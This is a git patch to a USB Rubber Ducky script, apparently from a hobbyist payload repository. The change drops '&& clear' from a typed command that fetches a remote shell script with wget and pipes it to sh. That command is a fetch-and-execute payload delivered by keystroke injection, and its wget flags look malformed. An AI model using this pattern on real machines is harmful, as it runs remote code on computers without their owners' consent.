From 0ea8ddf39a1a0a5c5dfc80e42012cfb2ed8cdc1a Mon Sep 17 00:00:00 2001 From: jasmine Date: Sat, 4 Jan 2025 08:46:21 +0800 Subject: [PATCH] don't clear console after running the script --- bootstrap.dd | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bootstrap.dd b/bootstrap.dd index f8f3212..f0b7eea 100644 --- a/bootstrap.dd +++ b/bootstrap.dd @@ -4,6 +4,6 @@ REM DESCRIPTION Fetch and execute shell script from remote repository REM VERSION 1.0 DELAY 200 -STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh && clear +STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh ENTER